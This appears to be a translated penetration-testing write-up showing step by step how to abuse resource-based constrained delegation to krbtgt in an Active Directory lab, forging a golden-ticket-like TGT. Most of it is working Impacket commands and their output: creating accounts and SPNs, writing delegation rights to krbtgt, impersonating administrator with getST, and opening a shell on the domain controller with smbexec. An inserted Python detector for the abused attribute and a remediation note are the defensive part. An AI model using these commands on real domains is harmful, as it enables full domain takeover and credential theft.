Suppose the delegated-to service B is krbtgt, and service A is a service account or machine account we control. If RBCD is configured from service A to service B, the account we control can obtain a ST for the KDC service (which is, in effect, a TGT).
With a ST for the KDC in hand, we can forge a TGT for a user of any privilege level, producing a variant of the golden ticket.
I. Choosing the account to control
Service A can be one of the following:
- An existing domain user that already has an SPN
- A newly created machine account (note: its password rotates automatically every 30 days)
- A newly created domain user that is then assigned an SPN
The first option, an existing domain user with an SPN, is recommended because it generates the least noise.
1. An existing domain user with an SPN
(base) ┌──(root㉿Kali)-[~]
└─# /usr/local/bin/GetUserSPNs.py sec.local/test2:"Az123456@" -dc-ip 10.10.4.2
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------- ---- -------- -------------------------- -------------------------- ----------
test/testspn1.sec.local:80 hack 2025-06-29 09:56:33.122517 2025-07-08 18:24:12.189432
2. Creating a new machine account
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/addcomputer.py sec.local/test2:"Az123456@" -dc-ip 10.10.4.2 -computer-name cmp1 -computer-pass "Az123456@" -method LDAPS
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account cmp1$ with password Az123456@.
3. Adding an SPN to a user
PS C:\Users\Administrator> setspn -U -A priv/golden test3
Checking domain DC=sec,DC=local
Registering ServicePrincipalNames for CN=test3,CN=Users,DC=sec,DC=local
priv/golden
Updated object
PS C:\Users\Administrator>
(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# GetUserSPNs.py sec.local/Administrator:Az123456@ -dc-ip 10.10.4.2
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------- ------------- -------------------------------------------------------------------------------- -------------------------- -------------------------- ----------
priv/golden1 Administrator CN=Organization Management,OU=Microsoft Exchange Security Groups,DC=sec,DC=local 2025-02-25 07:13:49.106232 2025-07-12 15:46:58.791715
test/testspn1.sec.local:80 hack 2025-06-29 09:56:33.122517 2025-07-12 15:55:44.185581
priv/golden test3 2025-07-12 16:01:07.498076 <never>
II. Exploiting the delegation
Configure RBCD from test3 to krbtgt
(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# rbcd.py -delegate-from test3 -delegate-to krbtgt -dc-ip 10.10.4.2 -action write sec.local/administrator:"Az123456@"
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*] test2 (S-1-5-21-2066713137-2133816201-3751750268-1164)
[*] hack (S-1-5-21-2066713137-2133816201-3751750268-1103)
[*] Delegation rights modified successfully!
[*] test3 can now impersonate users on krbtgt via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] test2 (S-1-5-21-2066713137-2133816201-3751750268-1164)
[*] hack (S-1-5-21-2066713137-2133816201-3751750268-1103)
[*] test3 (S-1-5-21-2066713137-2133816201-3751750268-1194)
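On the defender's side of this step, the value that rbcd.py -action write stores in msDS-AllowedToActOnBehalfOfOtherIdentity on the krbtgt object is a self-relative NT security descriptor, and every ACCESS_ALLOWED ACE in its DACL names a principal that may use S4U2Proxy against the object. The script below is an added example (my code, not part of the original article and not Impacket's rbcd.py): it decodes that binary value with only the standard library and emits an alert when the target is krbtgt, which should never carry this attribute. build_sample_sd and the SIDs fed to it are constructed sample data; the two RIDs mirror the hack and test3 entries in the rbcd.py output above. In practice the real value is read from the krbtgt object over LDAP (or with Get-ADUser krbtgt -Properties msDS-AllowedToActOnBehalfOfOtherIdentity), and with directory-object auditing enabled the write itself appears as Event ID 5136 naming that attribute.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity and flag RBCD on krbtgt.

Added example, not from the original article and not Impacket code. The value
is a self-relative NT security descriptor; every ACCESS_ALLOWED ACE in its DACL
names a principal that may use S4U2Proxy against the object. Sample data below
is constructed in code.
"""
import struct
from typing import List, Tuple

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION = 2
GENERIC_ALL_MASK = 0x000F01FF  # full control, what RBCD writers typically grant


def build_sid(sid_text: str) -> bytes:
    """Encode 'S-1-5-21-...' as a binary SID (only used to construct sample data)."""
    parts = sid_text.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %s" % sid_text)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def parse_sid(buf: bytes, off: int) -> Tuple[str, int]:
    """Decode a binary SID at offset off; return (text form, bytes consumed)."""
    revision, sub_count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % sub_count, buf, off + 8)
    text = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return text, 8 + 4 * sub_count


def allowed_to_act_sids(sd: bytes) -> List[str]:
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL."""
    revision, _sbz1, control, _owner, _group, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []  # no DACL: nobody may delegate to this object
    _rev, _sbz, _acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos = off_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = parse_sid(sd, pos + 8)  # ACE header (4) + access mask (4), then the SID
            sids.append(sid)
        pos += ace_size  # skip other ACE types (denies, object ACEs) by their declared size
    return sids


def build_sample_sd(sid_texts: List[str]) -> bytes:
    """Construct a self-relative descriptor granting full control to each SID (sample data only)."""
    owner = build_sid("S-1-5-32-544")  # BUILTIN\Administrators as owner and group
    aces = b""
    for text in sid_texts:
        sid_bin = build_sid(text)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bin), GENERIC_ALL_MASK) + sid_bin
    acl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(aces), len(sid_texts), 0) + aces
    off_owner = 20  # fixed header size
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, off_owner, off_group, 0, off_dacl)
    return header + owner + owner + acl


def rbcd_alerts(target_sam: str, sd: bytes, sensitive=("krbtgt",)) -> List[str]:
    """One alert line per principal when RBCD is set on a sensitive account such as krbtgt."""
    if target_sam.lower() not in sensitive:
        return []
    return ["RBCD on %s: %s may impersonate any user via S4U2Proxy; clear the attribute"
            % (target_sam, sid) for sid in allowed_to_act_sids(sd)]


# Constructed sample: the two RIDs mirror the hack and test3 entries printed by rbcd.py above.
SAMPLE_SIDS = [
    "S-1-5-21-2066713137-2133816201-3751750268-1103",
    "S-1-5-21-2066713137-2133816201-3751750268-1194",
]
SAMPLE_SD = build_sample_sd(SAMPLE_SIDS)

if __name__ == "__main__":
    for line in rbcd_alerts("krbtgt", SAMPLE_SD):
        print(line)
```

The remediation is simply to clear the attribute on krbtgt (an empty value is the normal state for that object); the parser skips deny and object ACEs by their declared size so a descriptor with mixed ACE types still yields the correct allow list.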
Performing the attack with Impacket
(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# getST.py -dc-ip 10.10.4.2 -spn krbtgt -impersonate administrator sec.local/test3:"Az123456@"
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@krbtgt_SEC.LOCAL@SEC.LOCAL.ccache
(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# export KRB5CCNAME=administrator@krbtgt_SEC.LOCAL@SEC.LOCAL.ccache
(base) ┌──(root㉿Kali)-[~]
└─# smbexec.py administrator@WIN2019-DC1.sec.local -dc-ip 10.10.4.7 -k -no-pass -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[+] StringBinding ncacn_np:WIN2019-DC1.sec.local[\pipe\svcctl]
[+] Using Kerberos Cache: administrator@krbtgt_SEC.LOCAL@SEC.LOCAL.ccache
[+] Domain retrieved from CCache: sec.local
[+] SPN CIFS/WIN2019-DC1.SEC.LOCAL@SEC.LOCAL not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/SEC.LOCAL@SEC.LOCAL
[+] Using TGT from cache
[+] Trying to connect to KDC at 10.10.4.7:88
[+] Executing %COMSPEC% /Q /c echo cd ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\mjPbdjfa.bat & %COMSPEC% /Q /c %SYSTEMROOT%\mjPbdjfa.bat & del %SYSTEMROOT%\mjPbdjfa.bat
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
Note: this failed against a domain controller running a newer build of Windows Server 2019, but succeeded against an older 2019 build and against 2016.